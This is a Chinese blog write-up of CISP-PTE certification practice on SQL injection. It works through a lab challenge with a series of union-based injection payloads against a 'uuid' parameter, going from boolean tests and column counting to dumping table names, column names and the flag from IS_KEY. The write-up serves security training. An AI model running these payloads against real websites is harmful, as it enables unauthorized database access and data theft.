当前位置:网站首页>2022 CISP-PTE(二)SQL注入
2022 CISP-PTE(二)SQL注入
2022-06-27 06:26:00 【Aτθ】
一、SQL注入(实操)
1、第一道
1.1 万能密码绕过


2、第二道
2.1 题目环境



2.2 判断注入
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and '1'='1
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and '1'='2
或者
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1;%00 ?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=2;%00


2.3 判断回显数
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' order by 6;%00 ?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' order by 7;%00


2.4 查看回显数字位置
?uuid=-1' union select 1,2,3,4,5,6;%00

2.5 查数据库名和用户
?uuid=-1' union select 1,database(),user(),4,5,6;%00

2.6 查表名
?uuid=-1' union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database();%00

2.7 查字段名
?uuid=-1' union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='IS_KEY';%00

2.8 查key值
?uuid=-1' union select 1,group_concat(haha),3,4,5,6 from IS_KEY;%00

边栏推荐
猜你喜欢
随机推荐
Scala之偏函数Partial Function
JVM garbage collection mechanism
The fourth question of the 299th weekly match 6103 Minimum fraction of edges removed from the tree
机 器 学 习
研究生数学建模竞赛-无人机在抢险救灾中的优化应用
Quick realization of Bluetooth ibeacn function
What's new in redis4.0 - active memory defragmentation
Keep 2 decimal places after multiplying SQLSEVER fields
Matlab quickly converts two-dimensional coordinates of images into longitude and latitude coordinates
[QT dot] QT download link
TiDB的事务概览
快速实现蓝牙iBeacn功能详解
【养成系】常用正则表达式
Inter thread wait and wake-up mechanism, singleton mode, blocking queue, timer
【入门】正则表达式基础入门笔记
多线程带来的的风险——线程安全
Software testing year end summary report template
TiDB 中的SQL 基本操作
论文阅读技巧
美摄云服务方案:专为轻量化视频制作场景打造









